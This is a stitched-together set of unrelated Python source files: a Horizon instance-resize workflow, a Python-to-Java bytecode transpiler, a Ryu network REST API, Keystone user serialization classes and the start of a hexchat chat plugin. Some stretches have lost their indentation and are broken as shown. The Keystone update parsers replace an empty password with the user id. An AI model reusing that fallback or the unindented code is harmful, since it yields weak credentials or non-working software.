'quota(s): %s.') % value_str)
self._errors['flavor'] = self.error_class([msg])
return cleaned_data
def populate_flavor_choices(self, request, context):
flavors = context.get("flavors").values()
if len(flavors) > 1:
flavors = instance_utils.sort_flavor_list(request, flavors)
if flavors:
flavors.insert(0, ("", _("Select a New Flavor")))
else:
flavors.insert(0, ("", _("No flavors available")))
return flavors
class Resource(workflows.Step):
    """Workflow step that wraps :class:`ResourceAction`."""
    action_class = ResourceAction
    contributes = ("flavors", "flavor", "checkboxlist")

    def contribute(self, data, context):
        """Copy the selection (ids + flavor) from form data into context."""
        if not data:
            return context
        raw_selection = data.get("checkboxlist", None)
        context['checkboxlist'] = raw_selection
        # The hidden field joins instance ids with "_".
        context['instance_ids'] = raw_selection.split("_")
        context['flavor'] = data.get("flavor", None)
        return context
class UpdateInstanceResource(workflows.Workflow):
    """Admin workflow that resizes a batch of instances to a new flavor."""
    slug = "update instance resource"
    name = _("Resize Instance")
    success_message = _('Update %(count)s.')
    failure_message = _('Unable to update %(count)s.')
    success_url = "horizon:admin:instances:index"
    multipart = True
    default_steps = (Resource,)

    def format_status_message(self, message):
        """Fill the %(count)s placeholder with "N instance(s)"."""
        # Dead locals removed: the original also read 'checkboxlist' and
        # 'name' from the context but never used them, and wrapped the
        # already-int count in int().
        count = len(self.context['instance_ids'])
        if count > 1:
            return message % {"count": _("%s instances") % count}
        return message % {"count": _("%s instance") % count}

    @sensitive_variables('context')
    def handle(self, request, context):
        """Trigger the batch resize; report errors through horizon.

        Returns True on success, False after routing the exception to
        ``exceptions.handle``.
        """
        try:
            flavor = context['flavor']
            # TODO(wengshuhua): device snapshots used to be purged here
            # before resizing:
            #   for instance_id in context['instance_ids']:
            #       names = api.nova.dev_snapshot_list(request, instance_id)
            #       for name in names or []:
            #           api.nova.dev_snapshot_delete(
            #               request, instance_id, name.snapshotname)
            LOG.info("========================= horizion -> horizon API:server_batch_resize=================")
            api.nova.server_batch_resize(request, context['instance_ids'],
                                         flavor, disk_config=None)
            return True
        except Exception:
            # Top-level boundary: surface the error via horizon's standard
            # handler and signal workflow failure.
            exceptions.handle(request)
            return False
|
|
import dis
from ..java import (
Code as JavaCode,
opcodes as JavaOpcodes,
ExceptionInfo as JavaExceptionInfo,
LineNumberTable
)
from .utils import extract_command, find_blocks
from .opcodes import ASTORE_name, ALOAD_name, ADELETE_name, IF, END_IF, resolve_jump
class IgnoreBlock(Exception):
    """An escape hatch; enable a block to be flagged as ignorable.

    Raised by ``Block.ignore_empty`` when the generated Java code body is
    effectively empty (nothing but its return opcode).
    """
    pass
class Block:
    """A unit of Python code being transpiled to Java bytecode.

    A Block accumulates extracted Python commands (``commands``) and the
    Java opcodes generated from them (``code``), together with the
    bookkeeping needed to assemble a ``JavaCode`` object in
    :meth:`transpile`: local variable slots, try/catch regions, jump
    fix-ups and source line numbers.
    """

    def __init__(self, parent=None, commands=None):
        self.parent = parent
        self.commands = commands if commands else []
        self.localvars = {}
        self.code = []
        self.try_catches = []
        self.blocks = []
        self.jumps = []
        self.jump_targets = {}
        self.unknown_jump_targets = {}
        # (obj, attr) pairs to be pointed at the next emitted opcode.
        self.next_resolve_list = []
        # Python source line to attach to the next emitted opcode.
        self.next_opcode_starts_line = None

    @property
    def module(self):
        """The module this block belongs to (delegated up the chain)."""
        return self.parent

    def store_name(self, name, arguments, allow_locals=True):
        """Emit opcodes that store the top of stack under *name*.

        With ``allow_locals`` false, the value is written into the class's
        ``attrs`` Hashtable instead of a Java local variable.
        """
        if allow_locals:
            self.add_opcodes(
                ASTORE_name(self, name)
            )
        else:
            # NOTE(review): ``self.klass`` is not defined on Block itself;
            # presumably supplied by a subclass -- confirm.
            self.add_opcodes(
                ASTORE_name(self, '#TEMP#'),
                JavaOpcodes.GETSTATIC(self.klass.descriptor, 'attrs', 'Ljava/util/Hashtable;'),
                JavaOpcodes.LDC(name),
                ALOAD_name(self, '#TEMP#'),
                JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'put', '(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;'),
                JavaOpcodes.POP(),
            )

    def load_name(self, name, allow_locals=True):
        """Emit opcodes that push the value bound to *name*.

        Lookup order: Java local (when allowed), then module globals,
        then builtins; a Java-side NameError is thrown if all miss.
        """
        try:
            # Look for a local first.
            if allow_locals:
                self.add_opcodes(
                    ALOAD_name(self, name)
                )
            else:
                raise KeyError('Not scanning locals')
        except KeyError:
            self.add_opcodes(
                # If there isn't a local, look for a global
                JavaOpcodes.GETSTATIC(self.module.descriptor, 'globals', 'Ljava/util/Hashtable;'),
                JavaOpcodes.LDC(name),
                JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'get', '(Ljava/lang/Object;)Ljava/lang/Object;'),

                # If there's nothing in the globals, then look for a builtin.
                IF(
                    [JavaOpcodes.DUP()],
                    JavaOpcodes.IFNONNULL
                ),
                JavaOpcodes.POP(),
                JavaOpcodes.GETSTATIC('org/Python', 'builtins', 'Ljava/util/Hashtable;'),
                JavaOpcodes.LDC(name),
                JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'get', '(Ljava/lang/Object;)Ljava/lang/Object;'),

                # If we still don't have something, throw a NameError.
                IF(
                    [JavaOpcodes.DUP()],
                    JavaOpcodes.IFNONNULL
                ),
                JavaOpcodes.POP(),
                JavaOpcodes.NEW('org/python/exceptions/NameError'),
                JavaOpcodes.DUP(),
                JavaOpcodes.LDC(name),
                JavaOpcodes.INVOKESPECIAL('org/python/exceptions/NameError', '<init>', '(Ljava/lang/String;)V'),
                JavaOpcodes.ATHROW(),
                END_IF(),
                END_IF(),

                # Make sure we actually have a Python object
                JavaOpcodes.CHECKCAST('org/python/types/Object')
            )

    def delete_name(self, name, allow_locals=True):
        """Emit opcodes that unbind *name* (local if allowed, else global)."""
        try:
            # Look for a local first.
            if allow_locals:
                self.add_opcodes(
                    ADELETE_name(self, name)
                )
            else:
                raise KeyError('Not scanning locals')
        except KeyError:
            self.add_opcodes(
                # If there isn't a local, look for a global
                JavaOpcodes.GETSTATIC(self.module.descriptor, 'globals', 'Ljava/util/Hashtable;'),
                JavaOpcodes.LDC(name),
                JavaOpcodes.INVOKEVIRTUAL('java/util/Hashtable', 'remove', '(Ljava/lang/Object;)Ljava/lang/Object;'),
            )

    def extract(self, code, debug=False):
        """Break a code object into the parts it defines, populating the
        provided block.
        """
        instructions = list(dis.Bytecode(code))
        blocks = find_blocks(instructions)

        # Commands are identified back to front, then reversed into
        # execution order.
        i = len(instructions)
        commands = []
        while i > 0:
            i, command = extract_command(instructions, blocks, i)
            commands.append(command)
        commands.reverse()

        # Bug fix: this dump was gated on ``if True:`` so it always
        # printed; honor the otherwise-unused ``debug`` flag instead.
        if debug:
            print('=====' * 10)
            print(code)
            print('-----' * 10)
            for command in commands:
                command.dump()
            print('=====' * 10)

        # Append the extracted commands to any pre-existing ones.
        self.commands.extend(commands)

    def tweak(self):
        """Tweak the bytecode generated for this block."""
        pass

    def add_opcodes(self, *opcodes):
        """Append *opcodes* to the code list, processing each one."""
        for opcode in opcodes:
            # print("ADD OPCODE", id(opcode), opcode)
            if opcode.process(self):
                self.code.append(opcode)

                # If we've flagged a code line change, attach that to the opcode
                if self.next_opcode_starts_line:
                    opcode.starts_line = self.next_opcode_starts_line
                    self.next_opcode_starts_line = None

                # Resolve any references to the "next" opcode.
                for (obj, attr) in self.next_resolve_list:
                    # print("   resolve %s reference on %s %s with %s %s" % (attr, obj, id(obj), opcode, id(opcode)))
                    setattr(obj, attr, opcode)
                self.next_resolve_list = []

    def stack_depth(self):
        "Evaluate the maximum stack depth required by a sequence of Java opcodes"
        depth = 0
        max_depth = 0
        for opcode in self.code:
            # print("   ", opcode, depth)
            depth = depth + opcode.stack_effect
            if depth > max_depth:
                max_depth = depth
        return max_depth

    def ignore_empty(self):
        """Raise IgnoreBlock when the code body is just a bare return."""
        if len(self.code) == 1 and isinstance(self.code[0], JavaOpcodes.RETURN):
            raise IgnoreBlock()
        elif len(self.code) == 2 and isinstance(self.code[1], JavaOpcodes.ARETURN):
            raise IgnoreBlock()

    def void_return(self):
        """Ensure that end of the code sequence is a Java-style return of void.

        Java has a separate opcode for VOID returns, which is different to
        RETURN NULL. Replace "SET NULL" "ARETURN" pair with "RETURN".
        """
        if len(self.code) >= 2 and isinstance(self.code[-2], JavaOpcodes.ACONST_NULL) and isinstance(self.code[-1], JavaOpcodes.ARETURN):
            return_opcode = JavaOpcodes.RETURN()

            # Update the jump operation to point at the new return opcode.
            for opcode in self.code[-1].references:
                opcode.jump_op = return_opcode
                return_opcode.references.append(opcode)

            for opcode in self.code[-2].references:
                opcode.jump_op = return_opcode
                return_opcode.references.append(opcode)

            # Then, check to see if either opcode had a line number association.
            # if so, preserve the first one.
            if self.code[-2].starts_line is not None:
                return_opcode.starts_line = self.code[-2].starts_line
            elif self.code[-1].starts_line is not None:
                return_opcode.starts_line = self.code[-1].starts_line

            self.code = self.code[:-2] + [return_opcode]

    def transpile(self):
        """Create a JavaCode object representing the commands stored in the block

        May raise ``IgnoreBlock`` if the block should be ignored.
        """
        # Convert the sequence of commands into instructions.
        # Most of the instructions will be opcodes. However, some will
        # be instructions to add exception blocks, line number references, etc
        for cmd in self.commands:
            cmd.transpile(self)

        # Java requires that every body of code finishes with a return.
        # Make sure there is one.
        if len(self.code) == 0 or not isinstance(self.code[-1], (JavaOpcodes.RETURN, JavaOpcodes.ARETURN)):
            self.add_opcodes(JavaOpcodes.RETURN())

        # Since we've processed all the Python opcodes, we can now resolve
        # all the unknown jump targets.
        # print('>>>>> Resolve references')
        for target, references in self.unknown_jump_targets.items():
            # print("   resolving %s references to %s" % (len(references), target))
            for opcode, position in references:
                resolve_jump(opcode, self, target, position)

        # Provide any tweaks that are needed because of the context in which
        # the block is being used.
        # print('>>>>> Tweak opcodes')
        self.tweak()

        # Now that we have a complete opcode list, postprocess the list
        # with the known offsets.
        offset = 0
        # print('>>>>> set offsets')
        for index, instruction in enumerate(self.code):
            # print("%4d:%4d (%s) %s" % (index, offset, id(instruction), instruction))
            instruction.java_index = index
            instruction.java_offset = offset
            offset += len(instruction)
        # print('>>>>> end set offsets')

        # Construct the exception table, updating any
        # end-of-exception GOTO operations with the right opcode.
        # Record a frame range for each one.
        exceptions = []
        for try_catch in self.try_catches:
            # print("TRY CATCH START", id(try_catch), try_catch.start_op, try_catch.start_op.java_offset)
            # print("          TRY END", try_catch.try_end_op, try_catch.try_end_op.java_offset)
            # print("              END", try_catch.end_op, try_catch.end_op.java_offset)
            for handler in try_catch.handlers:
                # print("   HANDLER", handler.start_op, handler.end_op, handler.descriptors)
                if handler.descriptors:
                    for descriptor in handler.descriptors:
                        exceptions.append(JavaExceptionInfo(
                            try_catch.start_op.java_offset,
                            try_catch.try_end_op.java_offset,
                            handler.start_op.java_offset,
                            descriptor
                        ))
                else:
                    exceptions.append(JavaExceptionInfo(
                        try_catch.start_op.java_offset,
                        try_catch.try_end_op.java_offset,
                        handler.start_op.java_offset,
                        'org/python/exceptions/BaseException'
                    ))

            # Add definitions for the finally block
            if try_catch.finally_handler:
                # print("   FINALLY", try_catch.finally_handler.start_op.java_offset, try_catch.finally_handler.end_op.java_offset)
                exceptions.append(JavaExceptionInfo(
                    try_catch.start_op.java_offset,
                    try_catch.try_end_op.java_offset,
                    try_catch.finally_handler.start_op.java_offset,
                    None
                ))
                for handler in try_catch.handlers:
                    # print("     h", handler.descriptors)
                    exceptions.append(JavaExceptionInfo(
                        handler.start_op.java_offset,
                        handler.catch_end_op.java_offset,
                        try_catch.finally_handler.start_op.java_offset,
                        None
                    ))

        # Update any jump instructions
        # print ("There are %s jumps" % len(self.jumps))
        for jump in self.jumps:
            # print ("JUMP", id(jump), jump, jump.java_offset, jump.jump_op, id(jump.jump_op))
            try:
                jump.offset = jump.jump_op.java_offset - jump.java_offset
            except AttributeError:
                jump.offset = jump.jump_op.start_op.java_offset - jump.java_offset

        # Construct a line number table from
        # the source code reference data on opcodes.
        line_numbers = []
        for code in self.code:
            if code.starts_line is not None:
                line_numbers.append((code.java_offset, code.starts_line))
        line_number_table = LineNumberTable(line_numbers)

        return JavaCode(
            max_stack=self.stack_depth() + len(exceptions),
            max_locals=len(self.localvars),
            code=self.code,
            exceptions=exceptions,
            attributes=[
                line_number_table
            ]
        )
|
|
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2012 Isaku Yamahata <yamahata at private email ne jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module provides a basic set of REST API.
# - Network registration
# - End-point port management
# - OpenFlow port number
# - MAC address (for anti-spoofing)
#
# Used by OpenStack Ryu plug-in.
import json
from webob import Response
from ryu.app import wsgi as app_wsgi
from ryu.app.wsgi import ControllerBase, WSGIApplication
from ryu.base import app_manager
from ryu.controller import network
from ryu.exception import NetworkNotFound, NetworkAlreadyExist
from ryu.exception import PortNotFound, PortAlreadyExist
from ryu.lib import dpid as dpid_lib
from ryu.lib import mac as mac_lib
# TODO:XXX
# define db interface and store those information into db
# REST API
# get the list of networks
# GET /v1.0/networks/
#
# register a new network.
# Fail if the network is already registered.
# POST /v1.0/networks/{network-id}
#
# update a new network.
# Success as nop even if the network is already registered.
#
# PUT /v1.0/networks/{network-id}
#
# remove a network
# DELETE /v1.0/networks/{network-id}
#
# get the list of sets of dpid and port
# GET /v1.0/networks/{network-id}/
#
# register a new set of dpid and port
# Fail if the port is already registered.
# POST /v1.0/networks/{network-id}/{dpid}_{port-id}
#
# update a new set of dpid and port
# Success as nop even if same port already registered
# PUT /v1.0/networks/{network-id}/{dpid}_{port-id}
#
# remove a set of dpid and port
# DELETE /v1.0/networks/{network-id}/{dpid}_{port-id}
#
# get the list of mac addresses of dpid and port
# GET /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/
#
# register a new mac address for dpid and port
# Fail if mac address is already registered or the mac address is used
# for other ports of the same network-id
# POST /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/{mac}
#
# update a new mac address for dpid and port
# Success as nop even if same mac address is already registered.
# For now, changing a mac address is not allowed; such a request fails.
# PUT /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/{mac}
#
# For now DELETE /v1.0/networks/{network-id}/{dpid}_{port-id}/macs/{mac}
# is not supported. mac address is released when port is deleted.
#
class NetworkController(ControllerBase):
    """REST handlers for network registration, listing and removal."""

    def __init__(self, req, link, data, **config):
        super(NetworkController, self).__init__(req, link, data, **config)
        self.nw = data

    def create(self, req, network_id, **_kwargs):
        # 409 when the network already exists, 200 otherwise.
        try:
            self.nw.create_network(network_id)
        except NetworkAlreadyExist:
            return Response(status=409)
        return Response(status=200)

    def update(self, req, network_id, **_kwargs):
        # Updating is a nop even for an already-registered network.
        self.nw.update_network(network_id)
        return Response(status=200)

    def lists(self, req, **_kwargs):
        networks = self.nw.list_networks()
        return Response(content_type='application/json',
                        body=json.dumps(networks))

    def delete(self, req, network_id, **_kwargs):
        try:
            self.nw.remove_network(network_id)
        except NetworkNotFound:
            return Response(status=404)
        return Response(status=200)
class PortController(ControllerBase):
    """REST handlers for (dpid, port) registration within a network."""

    def __init__(self, req, link, data, **config):
        super(PortController, self).__init__(req, link, data, **config)
        self.nw = data

    def create(self, req, network_id, dpid, port_id, **_kwargs):
        # 404 for an unknown network, 409 for a duplicate port.
        try:
            self.nw.create_port(network_id,
                                dpid_lib.str_to_dpid(dpid),
                                int(port_id))
        except NetworkNotFound:
            return Response(status=404)
        except PortAlreadyExist:
            return Response(status=409)
        return Response(status=200)

    def update(self, req, network_id, dpid, port_id, **_kwargs):
        try:
            self.nw.update_port(network_id,
                                dpid_lib.str_to_dpid(dpid),
                                int(port_id))
        except NetworkNotFound:
            return Response(status=404)
        return Response(status=200)

    def lists(self, req, network_id, **_kwargs):
        try:
            ports = self.nw.list_ports(network_id)
        except NetworkNotFound:
            return Response(status=404)
        return Response(content_type='application/json',
                        body=json.dumps(ports))

    def delete(self, req, network_id, dpid, port_id, **_kwargs):
        try:
            self.nw.remove_port(network_id,
                                dpid_lib.str_to_dpid(dpid),
                                int(port_id))
        except (NetworkNotFound, PortNotFound):
            return Response(status=404)
        return Response(status=200)
class MacController(ControllerBase):
    """REST handlers for per-port MAC addresses (anti-spoofing)."""

    def __init__(self, req, link, data, **config):
        super(MacController, self).__init__(req, link, data, **config)
        self.nw = data

    def create(self, _req, network_id, dpid, port_id, mac_addr, **_kwargs):
        # 404 for an unknown port, 409 for an already-registered MAC.
        try:
            self.nw.create_mac(network_id,
                               dpid_lib.str_to_dpid(dpid),
                               int(port_id),
                               mac_lib.haddr_to_bin(mac_addr))
        except PortNotFound:
            return Response(status=404)
        except network.MacAddressAlreadyExist:
            return Response(status=409)
        return Response(status=200)

    def update(self, _req, network_id, dpid, port_id, mac_addr, **_kwargs):
        try:
            self.nw.update_mac(network_id,
                               dpid_lib.str_to_dpid(dpid),
                               int(port_id),
                               mac_lib.haddr_to_bin(mac_addr))
        except PortNotFound:
            return Response(status=404)
        return Response(status=200)

    def lists(self, _req, network_id, dpid, port_id, **_kwargs):
        try:
            macs = self.nw.list_mac(dpid_lib.str_to_dpid(dpid), int(port_id))
            body = json.dumps([mac_lib.haddr_to_str(mac_addr)
                               for mac_addr in macs])
        except PortNotFound:
            return Response(status=404)
        return Response(content_type='application/json', body=body)
class RestAPI(app_manager.RyuApp):
    """Ryu application wiring the network/port/MAC REST routes.

    Used by the OpenStack Ryu plug-in; the full route table is described
    in the comment block at the top of this module.
    """
    # Shared contexts: the network registry and the WSGI app the
    # routes attach to.
    _CONTEXTS = {
        'network': network.Network,
        'wsgi': WSGIApplication
    }

    def __init__(self, *args, **kwargs):
        super(RestAPI, self).__init__(*args, **kwargs)
        self.nw = kwargs['network']
        wsgi = kwargs['wsgi']
        mapper = wsgi.mapper

        # /v1.0/networks and /v1.0/networks/{network_id}
        # NOTE: ``uri`` is extended incrementally below, so statement
        # order here is significant.
        wsgi.registory['NetworkController'] = self.nw
        route_name = 'networks'
        uri = '/v1.0/networks'
        mapper.connect(route_name, uri,
                       controller=NetworkController, action='lists',
                       conditions=dict(method=['GET', 'HEAD']))

        uri += '/{network_id}'
        s = mapper.submapper(controller=NetworkController)
        s.connect(route_name, uri, action='create',
                  conditions=dict(method=['POST']))
        s.connect(route_name, uri, action='update',
                  conditions=dict(method=['PUT']))
        s.connect(route_name, uri, action='delete',
                  conditions=dict(method=['DELETE']))

        # .../{dpid}_{port_id} -- end-point ports.
        wsgi.registory['PortController'] = self.nw
        route_name = 'ports'
        mapper.connect(route_name, uri,
                       controller=PortController, action='lists',
                       conditions=dict(method=['GET']))

        uri += '/{dpid}_{port_id}'
        requirements = {'dpid': dpid_lib.DPID_PATTERN,
                        'port_id': app_wsgi.DIGIT_PATTERN}
        s = mapper.submapper(controller=PortController,
                             requirements=requirements)
        s.connect(route_name, uri, action='create',
                  conditions=dict(method=['POST']))
        s.connect(route_name, uri, action='update',
                  conditions=dict(method=['PUT']))
        s.connect(route_name, uri, action='delete',
                  conditions=dict(method=['DELETE']))

        # .../macs/{mac_addr} -- MAC addresses. No DELETE route: MACs
        # are released when their port is deleted (see module comments).
        wsgi.registory['MacController'] = self.nw
        route_name = 'macs'
        uri += '/macs'
        mapper.connect(route_name, uri,
                       controller=MacController, action='lists',
                       conditions=dict(method=['GET']),
                       requirements=requirements)

        uri += '/{mac_addr}'
        requirements['mac_addr'] = mac_lib.HADDR_PATTERN
        s = mapper.submapper(controller=MacController,
                             requirements=requirements)
        s.connect(route_name, uri, action='create',
                  conditions=dict(method=['POST']))
        s.connect(route_name, uri, action='update',
                  conditions=dict(method=['PUT']))
|
|
# Copyright (c) 2010-2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from lxml import etree
from keystone.logic.types import fault
class User(object):
    """A keystone user as carried on the wire.

    Deserializes from the XML/JSON request formats and serializes back;
    the XML namespace is http://docs.openstack.org/identity/api/v2.0.
    """

    def __init__(self, password=None, id=None, name=None, tenant_id=None,
                 email=None, enabled=None, tenant_roles=None):
        self.id = id
        self.name = name
        self.tenant_id = tenant_id
        self.password = password
        self.email = email
        # Coerce any truthy/falsy input to a real bool.
        self.enabled = enabled and True or False
        self.tenant_roles = tenant_roles

    @staticmethod
    def from_xml(xml_str):
        """Build a User from XML; raise BadRequestFault when required
        fields are missing or the document cannot be parsed."""
        try:
            dom = etree.Element("root")
            dom.append(etree.fromstring(xml_str))
            root = dom.find("{http://docs.openstack.org/identity/api/v2.0}"
                            "user")
            if root is None:
                raise fault.BadRequestFault("Expecting User")
            # Bug fix: the "id" attribute was never read here; the
            # *builtin* ``id`` function was being passed to the
            # constructor instead.
            user_id = root.get("id")
            name = root.get("name")
            tenant_id = root.get("tenantId")
            email = root.get("email")
            password = root.get("password")
            enabled = root.get("enabled")
            if not name:
                raise fault.BadRequestFault("Expecting User")
            elif not password:
                raise fault.BadRequestFault("Expecting User password")
            elif not email:
                raise fault.BadRequestFault("Expecting User email")
            # Missing attribute defaults to enabled.
            enabled = enabled is None or enabled.lower() in ["true", "yes"]
            return User(password, user_id, name, tenant_id, email, enabled)
        except etree.LxmlError as e:
            raise fault.BadRequestFault("Cannot parse User", str(e))

    @staticmethod
    def from_json(json_str):
        """Build a User from JSON; raise BadRequestFault on bad input."""
        try:
            obj = json.loads(json_str)
            if not "user" in obj:
                raise fault.BadRequestFault("Expecting User")
            user = obj["user"]
            id = user.get('id', None)
            name = user.get('name', None)
            if not "password" in user:
                raise fault.BadRequestFault("Expecting User Password")
            password = user["password"]
            # Either an id or a name must be supplied (non-blank).
            if (id == None or len(id.strip()) == 0) and (
                    name == None or len(name.strip()) == 0):
                raise fault.BadRequestFault("Expecting User")
            elif password == None or len(password.strip()) == 0:
                raise fault.BadRequestFault("Expecting User password")
            if "tenantId" in user:
                tenant_id = user["tenantId"]
            else:
                tenant_id = None
            if "email" not in user:
                raise fault.BadRequestFault("Expecting User Email")
            email = user["email"]
            if "enabled" in user:
                set_enabled = user["enabled"]
                if not isinstance(set_enabled, bool):
                    raise fault.BadRequestFault("Bad enabled attribute!")
            else:
                set_enabled = True
            return User(password, id, name, tenant_id, email, set_enabled)
        except (ValueError, TypeError) as e:
            # Message fix: this previously said "Cannot parse Tenant"
            # (copy-paste from the Tenant type).
            raise fault.BadRequestFault("Cannot parse User", str(e))

    def to_dom(self):
        """Serialize to an lxml Element (only set attributes are emitted)."""
        dom = etree.Element("user",
                            xmlns="http://docs.openstack.org/identity/api/v2.0")
        if self.email:
            dom.set("email", unicode(self.email))
        if self.tenant_id:
            dom.set("tenantId", unicode(self.tenant_id))
        if self.id:
            dom.set("id", unicode(self.id))
        if self.name:
            dom.set("name", unicode(self.name))
        if self.enabled:
            dom.set("enabled", unicode(self.enabled).lower())
        if self.password:
            dom.set("password", unicode(self.password))
        if self.tenant_roles:
            dom_roles = etree.Element("tenantRoles")
            for role in self.tenant_roles:
                dom_role = etree.Element("tenantRole")
                dom_role.text = role
                dom_roles.append(dom_role)
            dom.append(dom_roles)
        return dom

    def to_xml(self):
        return etree.tostring(self.to_dom())

    def to_dict(self):
        user = {}
        if self.id:
            user["id"] = unicode(self.id)
        if self.name:
            user["name"] = unicode(self.name)
        if self.tenant_id:
            user["tenantId"] = unicode(self.tenant_id)
        if self.password:
            user["password"] = unicode(self.password)
        # NOTE(review): email/enabled are emitted unconditionally, so a
        # missing email serializes as "None" -- confirm this is intended.
        user["email"] = unicode(self.email)
        user["enabled"] = self.enabled
        if self.tenant_roles:
            user["tenantRoles"] = list(self.tenant_roles)
        return {'user': user}

    def to_json(self):
        return json.dumps(self.to_dict())
class User_Update(object):
"""Document me!"""
def __init__(self, password=None, id=None, name=None, tenant_id=None,
email=None, enabled=None):
self.id = id
self.name = name
self.tenant_id = tenant_id
self.password = password
self.email = email
self.enabled = bool(enabled) if enabled is not None else None
@staticmethod
def from_xml(xml_str):
try:
dom = etree.Element("root")
dom.append(etree.fromstring(xml_str))
root = dom.find("{http://docs.openstack.org/identity/api/v2.0}" \
"user")
if root == None:
raise fault.BadRequestFault("Expecting User")
id = root.get("id")
name = root.get("name")
tenant_id = root.get("tenantId")
email = root.get("email")
password = root.get("password")
enabled = root.get("enabled")
if enabled == None or enabled == "true" or enabled == "yes":
set_enabled = True
elif enabled == "false" or enabled == "no":
set_enabled = False
else:
raise fault.BadRequestFault("Bad enabled attribute!")
# TODO: WTF is this?!
if password == '':
password = id
return User(password=password, id=id, name=name,
tenant_id=tenant_id, email=email, enabled=set_enabled)
except etree.LxmlError as e:
raise fault.BadRequestFault("Cannot parse User", str(e))
@staticmethod
def from_json(json_str):
try:
obj = json.loads(json_str)
if not "user" in obj:
raise fault.BadRequestFault("Expecting User")
user = obj["user"]
id = user.get('id', None)
name = user.get('name', None)
password = user.get('password', None)
tenant_id = user.get('tenantId', None)
email = user.get('email', None)
enabled = user.get('enabled', True)
if not isinstance(enabled, bool):
raise fault.BadRequestFault("Bad enabled attribute!")
# TODO: WTF is this?!
if password == '':
password = id
return User(password, id, name, tenant_id, email, enabled)
except (ValueError, TypeError) as e:
raise fault.BadRequestFault("Cannot parse Tenant", str(e))
def to_dom(self):
dom = etree.Element("user",
xmlns="http://docs.openstack.org/identity/api/v2.0")
if self.email:
dom.set("email", unicode(self.email))
if self.tenant_id:
dom.set("tenantId", unicode(self.tenant_id))
if self.id:
dom.set("id", unicode(self.id))
if self.name:
dom.set("name", unicode(self.name))
if self.enabled is not None:
dom.set("enabled", unicode(self.enabled).lower())
if self.password:
dom.set("password", unicode(self.password))
return dom
def to_xml(self):
return etree.tostring(self.to_dom())
def to_dict(self):
user = {}
if self.id:
user["id"] = unicode(self.id)
if self.name:
user["name"] = unicode(self.name)
if self.tenant_id:
user["tenantId"] = unicode(self.tenant_id)
if self.password:
user["password"] = unicode(self.password)
if self.email:
user["email"] = unicode(self.email)
if self.enabled is not None:
user["enabled"] = self.enabled
return {'user': user}
def to_json(self):
    """Serialize this user as a JSON string (see to_dict for the layout)."""
    return json.dumps(self.to_dict())
class Users(object):
    """A collection of users plus pagination links."""

    def __init__(self, values, links):
        self.values = values
        self.links = links

    def to_xml(self):
        """Serialize users and links as a <users> XML document."""
        dom = etree.Element("users")
        dom.set(u"xmlns", "http://docs.openstack.org/identity/api/v2.0")
        for member in self.values:
            dom.append(member.to_dom())
        for link in self.links:
            dom.append(link.to_dom())
        return etree.tostring(dom)

    def to_json(self):
        """Serialize users and links as a JSON document."""
        user_dicts = [member.to_dict()["user"] for member in self.values]
        link_dicts = [link.to_dict()["links"] for link in self.links]
        return json.dumps({"users": {"values": user_dicts, "links": link_dicts}})
|
|
#!/usr/bin/env python3
#
# urc.py -- one long long horrible python script
#
# monolithic urc hub in python
#
# public domain
#
# for hexchat
__module_name__ = "urc"
__module_version__ = "0.1"
__module_description__ = "urc network plugin"
import binascii
import struct
import asyncio
from random import randrange, Random, randint
import random
import string
import socket
import time
import logging
import os
import threading
from hashlib import sha256
try:
import hexchat
except ImportError:
hexchat = None
def prnt(*args):
    """Print *args* concatenated into one string.

    Routes through hexchat's buffer when running as a plugin, otherwise
    stdout.  Fix: the stdout branch previously did ``print(args)`` which
    printed the raw tuple repr instead of the joined message.
    """
    text = ''.join('{}'.format(arg) for arg in args)
    if hexchat:
        hexchat.prnt(text)
    else:
        print(text)
# for urc_sign
try:
prnt("trying to load libnacl")
import libnacl
except ImportError:
prnt("no libnacl, will not do signed messages")
libnacl = None
else:
prnt("libnacl loaded")
# -- urc message types: 16-bit big-endian type tags carried in the hub header
URC_PLAIN = struct.unpack('!H', b'\x00\x00')[0]
URC_SIGN = struct.unpack('!H', b'\x01\x00')[0]
URC_PY_SIGN = struct.unpack('!H', b'\x01\x01')[0]
# random-bytes helper used for packet nonces.  NOTE: despite the old comment,
# os.urandom IS a cryptographically secure source on all supported platforms.
rand = lambda n : os.urandom(n)
# i don't like regular expressions
import re
# -- begin lameass regexp block
# character class allowed in nicks/channels/hostnames
_RE_CHARS = 'a-zA-Z0-9\.\\|\\-_~\\[\\]'
# channel name sigils
_CHAN_PREFIX = '&#+'
_RE_CHAN_PREFIX = '[%s]' % _CHAN_PREFIX
_RE_CHAN = '%s+[%s]+' % (_RE_CHAN_PREFIX, _RE_CHARS)
_RE_NICK = '[%s]+' % _RE_CHARS
# nick!user@host source prefix
_RE_SRC = '[%s]+![~%s]+@[%s]+' % ( (_RE_CHARS, ) * 3)
_RE_CMD = '[A-Z]+'
# full server-to-server line: ":src CMD [target] :message"
_RE_URCLINE = '^:(%s) (%s) ?(%s|%s)? ?:(.+)$' % (_RE_SRC, _RE_CMD, _RE_CHAN, _RE_NICK)
_RE_SRC_CMD = '([%s]+)!([~%s]+)@([%s]+)' % ( ( _RE_CHARS, ) * 3 )
# per-command client line patterns (matched against the upper-cased line)
_RE_NICK_CMD = '^NICK :?(%s)' % _RE_NICK
